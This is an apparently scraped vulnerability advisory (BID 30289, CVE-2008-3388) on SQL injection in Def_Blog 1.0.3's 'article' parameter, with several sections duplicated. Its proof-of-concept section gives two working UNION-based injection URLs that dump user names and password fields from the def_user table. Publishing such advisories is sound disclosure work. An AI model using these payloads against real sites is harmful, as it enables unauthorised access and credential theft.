Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
BID:30289
Info
Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30289 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3388 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2008 12:00AM |
| Updated: | Apr 16 2015 05:58PM |
| Credit: | CWH Underground |
| Vulnerable: |
Def-Blog Def_Blog 1.0.3 |
| Not Vulnerable: | |
Discussion
Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
Exploit / POC
Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--
http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--
http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--
Solution / Fix
Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Def_Blog 'article' Parameter Multiple SQL Injection Vulnerabilities
References:
References:
- Def_Blog Project Page (Def_Blog)